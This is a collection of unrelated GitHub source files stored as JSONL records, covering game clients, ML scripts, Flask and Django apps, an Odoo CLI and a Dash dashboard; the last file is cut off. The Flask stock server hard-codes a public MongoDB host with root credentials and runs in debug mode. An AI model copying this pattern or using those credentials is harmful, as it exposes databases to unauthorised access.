int(client_port)))\n self.lock = lock\n self.time_reference = time.time()\n\n \"\"\"\n Recieves messages from the server and then prints them\n \"\"\"\n\n def run(self):\n\n while True:\n data, addr = self.sock.recvfrom(1024)\n self.lock.acquire()\n try:\n self.client.server_message.append(data)\n self.print_messages()\n finally:\n self.lock.release()\n\n def print_messages(self):\n\n messages = client.get_messages()\n if len(messages) != 0:\n for message in messages:\n message = json.loads(message)\n sender, value = message.popitem()\n print(sender, \" : \", value)\n\n\"\"\"\nInitializes the client and log-array. If a port isn't supplied as an arg it defaults to port 9999.\nWaits for messages that are used for the application from the user.\n\"\"\"\n\nif __name__ == '__main__':\n\n log = []\n\n if sys.argv[1]:\n client = Client(sys.argv[1])\n else:\n client = Client(9999)\n\n print(\"Join a game with 'join' \\n\"\n \"Send a play with 'play ' \\n\"\n \"1 = rock, 2 = paper, 3 = scissors \\n\"\n \"Send a message with 'msg '\\n\"\n \"Send a play and message with 'pmsg \\n\"\n \"Print the log of this session with 'log' \\n\"\n \"Test the network with 50000 messages with 'test'\")\n\n while True:\n cmd = input('> ')\n\n if cmd.startswith('join'):\n client.send_msg('join')\n log.append(('join'))\n elif cmd.startswith('play'):\n client.send_msg('play', cmd[5:].strip())\n log.append(('play', cmd[5:].strip()))\n elif cmd.startswith('msg'):\n client.send_msg('msg', None, cmd[4:])\n log.append(('message', cmd[4:]))\n elif cmd.startswith('pmsg'):\n client.send_msg('pmsg', cmd[5:6], cmd[6:])\n log.append(('play and message', cmd[5:6], cmd[6:]))\n elif cmd.startswith('log'):\n for entry in log:\n print(entry)\n elif cmd.startswith('test'):\n client.send_msg('test')\n else:\n print('Invalid command')\n","repo_name":"zappi/distributed-communication","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":4757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"10634055004","text":"import tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport numpy as np\nimport os\n\nmnist = input_data.read_data_sets(\"./MNIST_data\", one_hot=True)\n\nbatch_size = 100\nn_batch = mnist.train.num_examples // batch_size\n\ntimes =111\n\nx = tf.placeholder(dtype=tf.float32, shape=[None, 784])\ny = tf.placeholder(dtype=tf.float32, shape=[None, 10])\n\nw = tf.Variable(tf.random_uniform(shape=[784, 10], dtype=tf.float32))\nb = tf.Variable(tf.random_uniform(shape=[10], dtype=tf.float32))\nwx_b = tf.add(tf.matmul(x, w), b)\nprediction = tf.nn.softmax(wx_b)\n\nloss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y, logits=prediction))\n\ntrain_step = tf.train.GradientDescentOptimizer(0.2).minimize(loss)\n\ninit = tf.global_variables_initializer()\n\ncorrect_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(prediction,1))\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\nsaver = tf.train.Saver()\n\n\ndef train():\n with tf.Session() as sess:\n sess.run(init)\n for epoch in range(times):\n for batch in range(n_batch):\n batch_xs, batch_ys = mnist.train.next_batch(batch_size)\n sess.run(train_step, feed_dict={x: batch_xs, y: batch_ys})\n\n acc = sess.run(accuracy, feed_dict={x: mnist.test.images, y: mnist.test.labels})\n print(\"Iter \" + str(epoch) + \",Testing Accuracy \" + str(acc))\n if not os.path.exists(\"E:/data/models/saver_save\"):\n os.makedirs(\"E:/data/models/saver_save\")\n\n saver.save(sess, \"E:/data/models/saver_save/test_model.ckpt\")\n\ndef restore(model):\n with tf.Session() as sess:\n sess.run(init)\n print(sess.run(accuracy, feed_dict={x: mnist.test.images, y: mnist.test.labels}))\n saver.restore(sess, model)\n print(sess.run(accuracy, feed_dict={x: mnist.test.images, y: mnist.test.labels}))\n\n\n\nif __name__ == '__main__':\n restore(model=\"E:/data/models/saver_save/test_model.ckpt\")\n\n\n\n","repo_name":"DaiJitao/machine_learning","sub_path":"DeepLearning/tensorflow/saver_save.py","file_name":"saver_save.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"34549854964","text":"import os\r\n\r\nfrom utils import *\r\nfrom defs import *\r\nfrom data_processing import process_data\r\nfrom data_processing import best_model\r\nfrom data_processing import simulations\r\nfrom analysis import get_stats\r\nfrom analysis import test_adequacy\r\n\r\nif __name__ == '__main__':\r\n id, main_res_dir, in_model, num_of_trees, sims_per_tree, CE_path, counts_file, tree_full_path = get_arguments()\r\n CE_res_filename, expectation_file, mlAncTree, root_freq_filename, sim_control, statistics_names = fixed_vars()\r\n m = len(in_model)\r\n for k in range(m): # run over all models or a single model\r\n model = in_model[k]\r\n for i in range(num_of_trees):\r\n ind = str(i + 1)\r\n output_dir = main_res_dir + \"/adequacy_test/\"\r\n if not os.path.exists(output_dir):\r\n res = os.system(\r\n \"mkdir -p \" + output_dir) # -p allows recusive mkdir in case one of the upper directories doesn't exist\r\n original_counts = process_data.get_counts(counts_file)\r\n original_counts_statistics = get_stats.calculate_statistics(original_counts, output_dir + \"orig_stats\",\r\n main_res_dir + mlAncTree)\r\n max_for_simulations = simulations.run_MA(main_res_dir, output_dir + sim_control, main_res_dir,\r\n output_dir, original_counts, model, sims_per_tree,\r\n tree_full_path, CE_path)\r\n adequacy_lst = test_adequacy.model_adequacy(output_dir, original_counts_statistics, model,\r\n max_for_simulations, sims_per_tree, id, main_res_dir)\r\n\r\n # id - job num/name\r\n # main_res_dir - chromevol results path for spesicfic model BASE_NUM/\r\n # in_model - the model the user want to check or selected one\r\n # num_of_trees - for now only 1 tree\r\n # sims_per_tree - num of sim (1000)\r\n # CE_path - chromevol exe path\r\n # counts_file -\r\n # tree_full_path -\r\n #\r\n","repo_name":"MayroseLab/ChromevolScripts","sub_path":"Chromevol_scripts/MA_main.py","file_name":"MA_main.py","file_ext":"py","file_size_in_byte":2128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"11104896457","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport time\nfrom os import environ as env\nimport novaclient.client\nfrom credentials import get_nova_creds\n\nnova = novaclient.client.Client(\"2\", **get_nova_creds())\n\ntry:\n\n # odabir resursa za stvaranje instance\n image = nova.images.find(name=\"ubuntu_cloud15\")\n flavor = nova.flavors.find(name=\"m1.small\")\n net = nova.networks.find(label=\"my_net2\")\n nics = [{'net-id': net.id}]\n \n # stvaranje instance\n instance = nova.servers.create(name=\"my_inst2\", image=image,\n flavor=flavor, key_name=\"my_key1\",\n nics=nics)\n\n # cekanje 5 sec. prije ispisa\n # kako bi se narede unutar nove stigle izvršiti\n print(\"Sleeping for 5s after create command\")\n time.sleep(5)\n\n # ispis svih instanci\n print(\"List of VMs\")\n print(nova.servers.list())\n\nfinally:\n print(\"Execution Completed\")","repo_name":"SaltyOrange/ARIKS2016","sub_path":"Skripte/Python/Skripta5.py","file_name":"Skripta5.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"24506944398","text":"from provworkflow.agent import Agent\nfrom rdflib.namespace import PROV, RDF\n\n\ndef test_prov_to_graph():\n \"\"\"A basic ProvReporter should prov_to_graph an Activity with a startedAtTime & endedAtTime\n\n :return: None\n \"\"\"\n\n a = Agent()\n g = a.prov_to_graph()\n\n # check all properties required do exist\n assert (a.uri, RDF.type, PROV.Agent) in g, \"g must contain a prov:Agent\"\n\n # actedOnBehalfOf test\n a1 = Agent()\n a2 = Agent(acted_on_behalf_of=a1)\n g = a2.prov_to_graph()\n assert (\n a2.uri,\n PROV.actedOnBehalfOf,\n a1.uri,\n ) in g, \"g must contain a2 prov:actedOnBehalfOf a1\"\n","repo_name":"surroundaustralia/provwf","sub_path":"tests/test_agent.py","file_name":"test_agent.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"23755277698","text":"from flask import flash, url_for, redirect, request, render_template\nfrom flask_login import login_required, current_user\n\nfrom app.blueprints.main.forms import TrackerForm, CategoryForm\nfrom . import main\nfrom app.models import Tracker, TrackerCategory\nfrom app.utils import db\nfrom app.decorator import admin_required\n\n@main.route('/', methods=['GET'])\n@login_required\ndef index():\n active_trackers = Tracker.query.filter_by(active=True).all()\n archived_trackers = Tracker.query.filter_by(active=False).all()\n categories = TrackerCategory.query.all()\n categories_count = TrackerCategory.query.count()\n return render_template('pages/home.html', active=active_trackers, archived = archived_trackers, categories=categories, categories_count=categories_count)\n\n\n@main.route('/trackers/', methods=['GET'])\n@main.route('/trackers/', defaults={'page': 1}, methods=['GET'])\n@login_required\ndef trackers(page): \n trackers = Tracker.query.filter_by(user=current_user).order_by(Tracker.created_at.desc()).paginate(page, per_page=50)\n categories = TrackerCategory.query.all()\n categories_count = TrackerCategory.query.count()\n return render_template('pages/trackers.html', archived = trackers, categories=categories, categories_count=categories_count)\n\n\n\n@main.route('/tracker///')\n@login_required\ndef view_tracker(tracker_id, tracker_title):\n obj = Tracker.query.filter_by(user=current_user).filter_by(id=tracker_id).filter_by(title=tracker_title).first_or_404()\n latest = Tracker.query.filter_by(user=current_user).order_by(Tracker.created_at.desc()).all()[:5]\n categories = TrackerCategory.query.all()\n return render_template('pages/tracker_detail.html', obj=obj, categories=categories, latest=latest) \n\n@main.route('/tracker/add', methods=['GET','POST'])\n@login_required\ndef create_tracker():\n form = TrackerForm()\n if form.validate_on_submit():\n tracker_obj = Tracker(\n title = form.title.data,\n category = form.categories.data,\n description = form.description.data,\n timestamp = form.timestamp.data,\n user = current_user\n )\n db.session.add(tracker_obj)\n db.session.commit()\n flash(f'You have successfully created a tracker, it will expire in {form.timestamp.data} minutes')\n return redirect(url_for('main.view_tracker', tracker_id=tracker_obj.id, tracker_title=tracker_obj.title))\n return render_template('pages/tracker-add-edit.html', form=form) \n\n@main.route('/tracker///_edit', methods=['GET', 'POST'])\n@login_required\ndef edit_tracker(tracker_id, tracker_title):\n tracker = Tracker.query.filter_by(user=current_user).first_or_404(tracker_id)\n form = TrackerForm(obj=tracker)\n if request.method == 'POST':\n if form.validate_on_submit():\n tracker.title = form.title.data\n tracker.timestamp = form.timestamp.data\n tracker.description = form.description.data\n tracker.category = form.categories.data\n db.session.add(tracker)\n db.session.commit()\n flash(f'You have successfully Edited this tracker, it will now expire in {form.timestamp.data} minutes')\n return redirect(url_for('main.view_tracker', tracker_id=tracker.id, tracker_title=tracker.title))\n return render_template('pages/tracker-add-edit.html', tracker=tracker, form=form) \n \n\n\n@main.route('/tracker///_delete')\n@login_required\ndef delete_tracker(tracker_id,tracker_title):\n obj = Tracker.query.filter_by(user=current_user).filter_by(id=tracker_id).\\\n filter_by(title=tracker_title).first_or_404()\n db.session.delete(obj)\n db.session.commit()\n flash('Tracker successfully deleted, feel free to create more', 'success')\n return redirect(url_for('main.tracker'))\n\n\n\n\n\n\n#Tracker Categories\n\n\n@main.route('/tracker/categories/add', methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef tracker_category_create():\n form = CategoryForm()\n if request.method == 'POST':\n if form.validate_on_submit():\n cat = TrackerCategory(\n title=form.title.data,\n description=form.description.data,\n )\n db.session.add(cat)\n db.session.commit()\n flash('Category {} successfully created'.format(cat.title), 'success')\n return redirect(url_for('main.index'))\n return render_template('pages/category-add-edit.html', form=form)\n\n\n@main.route('/tracker/categories//edit', methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef tracker_category_edit(category_id):\n category = TrackerCategory.query.get_or_404(category_id)\n form = CategoryForm(obj=category)\n if request.method == 'POST':\n if form.validate_on_submit():\n category.title = form.title.data\n category.description = form.description.data\n db.session.add(category)\n db.session.commit()\n flash('Category {} successfully Updated'.format(category.name), 'success')\n return redirect(url_for('main.index'))\n return render_template('pages/categories/add-edit.html', form=form, category=category)\n\n\n@main.route('/tracker/categories//_delete', methods=['POST'])\n@login_required\n@admin_required\ndef tracker_category_delete(category_id):\n cat = TrackerCategory.query.get_or_404(category_id)\n db.session.delete(cat)\n db.session.commit()\n flash('Successfully deleted Category.', 'success')\n return redirect(url_for('main.index'))\n\n\n\n@main.route('/category//', methods=['GET'])\n@main.route('/category/', defaults={'page': 1}, methods=['GET'])\n@login_required\ndef main_category(category_id, page):\n category = TrackerCategory.query.get(category_id)\n posts = Tracker.query.filter(Tracker.category.has(id=category.id)).order_by(Tracker.created_at.desc()).paginate(page, per_page=40)\n if category and posts:\n return render_template('pages/category-detail.html',posts=posts, category=category)\n \n\n\n@main.route('/category/', methods=['GET'])\n@main.route('/category/', defaults={'page': 1}, methods=['GET'])\ndef categories(page):\n category = TrackerCategory.query.paginate(page, per_page=50)\n return render_template('pages/category.html',categories=category) \n\n\"\"\"\n@main.route('/tracker//comment', methods=['POST'])\n@login_required\ndef add_comment(tracker_id):\n\n post = Tracker.query.get_or_404(tracker_id)\n\n data = request.get_json(force = True)\n text = data['text']\n\n if not text:\n\n return dict(status='fail', message='text required'), 400\n\n parent_id = data['parent_id']\n\n if parent_id and parent_id != '0' and parent_id != 0:\n\n comment = mainComment(\n\n post_id=post.id,\n\n text=text,\n\n user_id=current_user.id,\n\n parent_id=parent_id\n\n )\n\n else:\n\n comment = mainComment(\n\n post_id=post.id,\n\n text=text,\n\n user_id=current_user.id,\n\n )\n\n db.session.add(comment)\n\n db.session.commit()\n\n return dict(status='sucess', message=\"comment added successfuly\"), 201\n\"\"\"\n\n\n","repo_name":"vendari12/Quantified-self","sub_path":"src/app/blueprints/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7329,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"11506276708","text":"import requests\nfrom lxml import etree\n\n\n#爬取知乎网发现,今日热点的问题标题,回答者,回答。xpath的方法尝试\n# https://www.zhihu.com/explore\n\n#分析主页面\nheader = {\"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36\"}\nreq = requests.get('https://www.zhihu.com/explore',headers=header)\nc = req.text\n\n# 初始化\nhtml = etree.HTML(c)\n# 获取热点标题\nhea = html.xpath(\"//div[@class='explore-feed feed-item']//a[@class='question_link']/text()\")\n# print(hea)\n\n# 获取回答者\naut = html.xpath(\"//div[@class='explore-feed feed-item']//div/@data-author-name\")\n# print(aut)\n\n# 获取回答内容,取到的内容太多特殊字符了,只能分页面取了\nwrite = html.xpath(\"//div[@class='explore-feed feed-item']//div/@data-entry-url\")\n# print(write)\nfor i in write:\n header = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36\"}\n re = requests.get('https://www.zhihu.com'+i, headers=header)\n c2 = re.text\n\n htm = etree.HTML(c2)\n write2 = htm.xpath(\"//span[@class='RichText ztext CopyrightRichText-richText']/p/text()\")\n # print(write2)\n\n# 内容组合,也是个问题,内容加不进去。。考虑下爬取豆瓣影评的方法,直接分页面找所有的,就无需组合了\ndictionary = list(zip(hea,aut))\nprint(dictionary)\n\n","repo_name":"zhouf1234/untitled8","sub_path":"xpath-demo练习5.py","file_name":"xpath-demo练习5.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"6082158052","text":"import numpy as np\nimport traceback\nimport sys\n\ndef runtest(test,name):\n print('Running Test: %s ... ' % (name),end='')\n try:\n if test():\n print('✔ Passed!')\n else:\n print(\"✖ Failed!\\n The output of your function does not match the expected output. Check your code and try again.\")\n except Exception as e:\n print('✖ Failed!\\n Your code raises an exception. The following is the traceback of the failure:')\n print(' '.join(traceback.format_tb(sys.exc_info()[2])))\n\n\ndef classify_linear_grader(xs,w,b=None):\n w = w.flatten() \n predictions=np.zeros(xs.shape[0])\n if b is None:\n b = 0\n predictions = np.sign(xs.dot(w) + b)\n return predictions\t","repo_name":"ecornelldev/CIS530","sub_path":"CIS533/perceptron/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"10601688802","text":"import random\nfrom transformers import DistilBertTokenizerFast\n\nfrom ml.dataloaders.mcoco import get_cococaptions_dataloader\n\n# setup random seed\nrandom.seed(17)\n\ndef test_distilbert_tokenizer(epochs, batch_size):\n tokenizer = DistilBertTokenizerFast.from_pretrained('distilbert-base-uncased')\n dataset_loader = get_cococaptions_dataloader(mode='train', batch_size=batch_size)\n\n for epoch in range(epochs): # loop over the dataset multiple times\n for i, data in enumerate(dataset_loader, 0):\n # get the inputs; data is a list of [input: image, labels: Tuple[str,...]]\n inputs, labels = data\n\n # NOTE: labels is a list of tuples, each tuple is one set of labels\n rand_idx = random.randint(0, len(labels) - 1)\n randomized_labels = list(labels[rand_idx])\n\n # inputs is a dict with input_ids and attention_mask\n inputs = tokenizer(randomized_labels, padding=\"max_length\", truncation=True)\n print(inputs)\n \n break\n break\n\n print('Finished Testing DistilBERT Tokenizer')","repo_name":"callaunchpad/phodexr","sub_path":"ml/testing/distilbert_tokenizer.py","file_name":"distilbert_tokenizer.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"15040006000","text":"from flask import Flask, jsonify, request\nfrom pymongo import MongoClient, errors\nfrom flask_cors import CORS\napp = Flask(__name__)\nCORS(app)\n# global variables for MongoDB host (default port is 27017)\nDOMAIN = '15.236.141.54'\nPORT = 27017\n \nclient = MongoClient(\n host = [ str(DOMAIN) + \":\" + str(PORT) ],\n serverSelectionTimeoutMS = 3000, # 3 second timeout\n username = \"root\",\n password = \"1234\",\n)\n # print the version of MongoDB server if connection successful\nmydb = client.stocks\nmydb = client['stocktsla']\nmycol = mydb[\"TSLA\"]\ncol = mydb[\"TSLA30\"]\n \n@app.route('/stock/TSLA', methods=['GET'])\ndef get_all_frameworks():\n output = []\n for x in mycol.find():\n output.append({'day':x['day'],'hour':x['hour']+1,'minute':x['minute'],'second' : x['second'], 'data' : x['data']})\n return jsonify({'result' : output})\n \n@app.route('/stock/TSLA/30', methods=['GET'])\ndef get_all_framew():\n output = []\n for x in col.find():\n output.append({'Datetime':x['Datetime'],'Open' : x['Open'], 'High' : x['High'], 'Low' : x['Low'], 'Close' : x['Close']})\n return jsonify(output)\n \n@app.route('/stock/TSLA////', methods=['GET'])\ndef get_all_framework(day,hour,minute,second):\n output = []\n q = mycol.find_one({'day':int(day),'hour':int(hour),'minute':int(minute),'second':int(second)})\n \n if q:\n output = {'day':q['day'],'hour':q['hour'],'minute':q['minute'],'second' : q['second'], 'data' : q['data']}\n else:\n output = 'No results found'\n \n return jsonify({'result' : output})\n \n \nif __name__ == '__main__':\n app.run(host='0.0.0.0',port=80,debug=True)\n \n \n","repo_name":"abdrrahimelh/middlwares","sub_path":"Rest Server/Rest.py","file_name":"Rest.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"26138181920","text":"import matplotlib.pyplot as plt\r\nfrom numpy import *\r\n\r\n\"\"\"\r\nLoad simple dataset for linear regression.\r\nRow in file: [feature1, feature2, ..., featureN, label]\r\nAnd then, we can get matrix of dataset and labels conveniently.\r\n\"\"\"\r\nclass Simple_dataset(object):\r\n\r\n def __init__(self, file_name):\r\n fr = open(file_name)\r\n dataset = []; labels = [];\r\n for line in fr.readlines():\r\n splits = line.split()\r\n num_features = len(splits)\r\n # The column in the end is the label of this line.\r\n data = [float(splits[i]) for i in range(num_features - 1)]\r\n label = float(splits[-1])\r\n\r\n dataset.append(data)\r\n labels.append(label)\r\n self.dataset = dataset\r\n self.labels = labels\r\n\r\n def normalize(self):\r\n dataset = mat(self.dataset)\r\n means = mean(dataset, 0)\r\n vars = var(dataset, 0)\r\n # operations between matrix and vector:\r\n self.dataset = (dataset - means) / vars\r\n\r\n\r\n # Plot all the data in a figure\r\n def draw_scatter(self):\r\n fig = plt.figure()\r\n ax = fig.add_subplot(111)\r\n plt.xlabel('X1'); plt.ylabel('Label')\r\n # Note: in order to support 'dataset[:, 1]', we must change dataset from list to array.\r\n dataset = array(self.dataset)\r\n ax.scatter(dataset[:, 1], self.labels, s=8)\r\n plt.show()\r\n\r\n\r\nif __name__ == '__main__':\r\n my_dataset = Simple_dataset('data/training_set.txt')\r\n my_dataset.normalize()\r\n my_dataset.draw_scatter()\r\n\r\n","repo_name":"Kobeyond/Codes-for-Machine-Learning","sub_path":"Linear Regression/simple_dataset.py","file_name":"simple_dataset.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"35"} +{"seq_id":"31292932081","text":"from django.urls import path\nfrom .views import StaffDashboard,SatffStudentList,SatffCandidateList,StaffStudentProfile,SatffCandidateProfile,StaffProfileDisplay\nfrom .views import StaffStudentAddForm,SatffCandidateAddForm,SatffCandidateProfileBack,StaffStudentProfileback\nfrom .views import Stafflogout\nfrom .views2 import StaffCandCampaign,StaffCandidatePostView\nimport random\ndef dynamic_url():\n Large=['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z']\n small=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']\n sign=['1','2','3','4','5','6','7','9','0','+0','_']\n p=(''.join([''.join( random.sample(Large, 5)),''.join(random.sample(small, 5)),''.join(random.sample(sign, 5))]))\n return (''.join( random.sample(p, 10)))\nurlpatterns = [\n path('',StaffDashboard,name='StaffDashboard'),\n path('StaffProfileDisplay%s/'%dynamic_url(),StaffProfileDisplay,name='StaffProfileDisplay'),\n #StaffProfileDisplay\n\n path('Stulist/',SatffStudentList,name='StaffStudentList'),\n path('Stuprofile/',StaffStudentProfile,name='StaffStudentProfile'),\n path('Stuprofileback/',StaffStudentProfileback,name='StaffStudentProfileback'),\n path('%s/'%dynamic_url(),StaffStudentAddForm,name='StaffStudentAddForm'),\n\n path('CandidList/',SatffCandidateList,name='SatffCandidateList'),\n path('CandidProfile%s/'%dynamic_url(),SatffCandidateProfile,name='SatffCandidateProfile'),\n path('CandidProfileback/',SatffCandidateProfileBack,name='SatffCandidateProfileBack'),\n path('candidateAddForm',SatffCandidateAddForm,name='SatffCandidateAddForm'),\n\n path('Stafflogout/',Stafflogout,name='Stafflogout'),\n\n path('StaffCandCampaign/',StaffCandCampaign,name='StaffCandCampaign'),\n path('StaffCandidatePostView/',StaffCandidatePostView,name='StaffCandidatePostView'),\n]\n\n\n","repo_name":"rp2691981/VotingApp","sub_path":"Voting1/Staff/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"23446368945","text":"import sys\nimport os\nimport tempfile\nimport click\n\nfrom odooku.cli.resolve import resolve_db_name, resolve_db_name_multiple\n\n\n__all__ = [\n 'trans'\n]\n\n\nCHUNK_SIZE = 16 * 1024\n\n\n@click.command()\n@click.argument('language', nargs=1)\n@click.option(\n '--db-name',\n callback=resolve_db_name\n)\n@click.option(\n '--module',\n multiple=True\n)\n@click.option(\n '--fix',\n is_flag=True\n)\n@click.pass_context\ndef export(ctx, language, db_name, module, fix):\n modules = module or ['all']\n\n from odoo.modules.registry import Registry\n from odooku.api import environment\n from odoo.tools import trans_export\n\n with tempfile.TemporaryFile() as t:\n\n # Perform checks (and possible fixes)\n registry = Registry(db_name)\n with registry.cursor() as cr:\n with environment(cr) as env:\n lang = env['res.lang'].with_context(dict(active_test=False)).search([('code', '=', language)])\n if not lang:\n raise ValueError(\"Language %s does not exist\" % language)\n if not lang[0].active:\n if not fix:\n raise ValueError(\"Language %s is not activated\" % language)\n else:\n installed = env['ir.module.module'].search([('state', '=', 'installed')])\n installed._update_translations(language)\n\n if module:\n installed = env['ir.module.module'].search([('name', 'in', module), ('state', '=', 'installed')])\n missing = set(module) - set([mod.name for mod in installed])\n if missing:\n if not fix:\n raise ValueError(\"Modules '%s' are not installed\" % \", \".join(missing))\n else:\n ctx.obj['config']['init'] = {\n module_name: 1\n for module_name in module\n }\n \n # Export\n registry = Registry.new(db_name, update_module=fix)\n with registry.cursor() as cr:\n with environment(cr) as env:\n trans_export(language, modules, t, 'po', cr)\n \n t.seek(0)\n # Pipe to stdout\n while True:\n chunk = t.read(CHUNK_SIZE)\n if not chunk:\n break\n sys.stdout.buffer.write(chunk)\n\n\n@click.command('import')\n@click.argument('language', nargs=1)\n@click.option(\n '--db-name',\n callback=resolve_db_name\n)\n@click.option(\n '--overwrite',\n is_flag=True\n)\n@click.pass_context\ndef import_(ctx, language, db_name, overwrite):\n context = {\n 'overwrite': overwrite\n }\n\n from odoo.modules.registry import Registry\n from odooku.api import environment\n from odoo.tools import trans_load\n\n with tempfile.NamedTemporaryFile(suffix='.po', delete=False) as t:\n registry = Registry(db_name)\n\n # Read from stdin\n while True:\n chunk = sys.stdin.buffer.read(CHUNK_SIZE)\n if not chunk:\n break\n t.write(chunk)\n t.close()\n\n with registry.cursor() as cr:\n with environment(cr) as env:\n trans_load(cr, t.name, language, context=context)\n\n os.unlink(t.name)\n\n\n@click.command('update')\n@click.option(\n '--db-name',\n multiple=True,\n callback=resolve_db_name_multiple\n)\n@click.option(\n '--module',\n multiple=True\n)\n@click.option(\n '--language',\n multiple=True\n)\n@click.option(\n '--overwrite',\n is_flag=True\n)\n@click.pass_context\ndef update(ctx, db_name, module, language, overwrite):\n context = {\n 'overwrite': overwrite\n }\n\n from odoo.modules.registry import Registry\n from odooku.api import environment\n\n domain = [('state', '=', 'installed')]\n if module:\n domain = [('name', 'in', module)]\n\n\n for db in db_name:\n registry = Registry(db)\n with registry.cursor() as cr:\n with environment(cr) as env:\n mods = env['ir.module.module'].search(domain)\n mods.with_context(overwrite=overwrite)._update_translations(language)\n\n\n@click.group()\n@click.pass_context\ndef trans(ctx):\n pass\n\n\ntrans.add_command(export)\ntrans.add_command(import_)\ntrans.add_command(update)\n","repo_name":"odooku/odooku","sub_path":"odooku_commands/trans.py","file_name":"trans.py","file_ext":"py","file_size_in_byte":4378,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"35"} +{"seq_id":"26885057731","text":"\"\"\"\n dashCO2.dashapp\n ~~~~~~~~~~~~~~~\n\n Applicación en dash\n\"\"\"\n\nimport arrow\nimport dash\nimport dash_core_components as dcc\nimport dash_daq as daq\nimport dash_html_components as html\nimport plotly.graph_objs as go\nfrom dash.dependencies import Input, Output\n\nfrom . import config, models\nfrom .shared import COLORS, color_from_value\n\nSPARKLINE_LAYOUT = {\n \"uirevision\": True,\n \"margin\": dict(l=0, r=0, t=4, b=4, pad=0),\n \"xaxis\": dict(\n showline=False,\n showgrid=False,\n zeroline=False,\n showticklabels=False,\n ),\n \"yaxis\": dict(\n showline=False,\n showgrid=False,\n zeroline=False,\n showticklabels=False,\n ),\n \"paper_bgcolor\": \"rgba(0,0,0,0)\",\n \"plot_bgcolor\": \"rgba(0,0,0,0)\",\n}\n\n\ndef build_banner(dash_app):\n return html.Div(\n id=\"banner\",\n className=\"banner\",\n children=[\n html.Div(\n id=\"banner-logo\",\n children=[\n html.Img(\n id=\"logo\",\n src=dash_app.get_asset_url(\"logo-exactas.png\"),\n ),\n ],\n ),\n html.Div(\n id=\"banner-text\",\n className=\"row metric-row metric-row-up\",\n children=[html.H5(\"Monitoreo de CO2\")],\n ),\n html.Div(\n id=\"banner-summary\",\n className=\"row metric-row\",\n children=[\n \"DIA y HORA\",\n daq.Indicator(\n id=\"summary-ok\",\n value=True,\n color=COLORS.OK,\n size=12,\n className=\"indicator\",\n ),\n \" N\",\n daq.Indicator(\n id=\"summary-warning\",\n value=True,\n color=COLORS.WARNING,\n size=12,\n className=\"indicator\",\n ),\n \" N\",\n daq.Indicator(\n id=\"summary-danger\",\n value=True,\n color=COLORS.DANGER,\n size=12,\n className=\"indicator\",\n ),\n \" N\",\n daq.Indicator(\n id=\"summary-offline\",\n value=True,\n color=COLORS.OFFLINE,\n size=12,\n className=\"indicator\",\n ),\n \" N\",\n ],\n ),\n ],\n )\n\n\ndef build_header():\n return html.Div(\n className=\"section-banner\",\n style={\"width\": \"100%\", \"display\": \"inline-block\"},\n children=[\n \"Sensores\",\n html.Div(\n id=\"subsection-banner\",\n children=[\n dcc.Checklist(\n options=[\n dict(\n label=\"Ver valores\", value=\"view-values\"\n ),\n ],\n value=[\"view-values\"],\n id=\"view-options\",\n className=\"checklist-smoothing\",\n labelStyle={\"display\": \"inline-block\"},\n labelClassName=\"mleft\",\n ),\n html.Div(style=dict(width=\"35px\")),\n dcc.Checklist(\n options=[],\n value=[],\n id=\"filter-buildings\",\n className=\"checklist-smoothing\",\n labelStyle={\"display\": \"inline-block\"},\n labelClassName=\"mleft\",\n ),\n ],\n style={\"float\": \"right\", \"display\": \"flex\"},\n ),\n ],\n )\n\n\ndef build_box(\n device: dict,\n dev_recent_measurements: (list, list),\n buildings,\n view_options=(),\n):\n\n devid = device[\"id\"]\n serial_number = device[\"serial_number\"]\n floor = device[\"floor\"]\n box_title = device[\"room\"]\n building = device[\"building\"]\n\n if box_title == \"s/d\":\n box_title = f\"s/n {serial_number}\"\n\n ref_serial_no = reference_value = None\n # if 'view-reference' in view_options:\n # ref_serial_no, reference_value = get_reference_value(serialno)\n\n x, y = 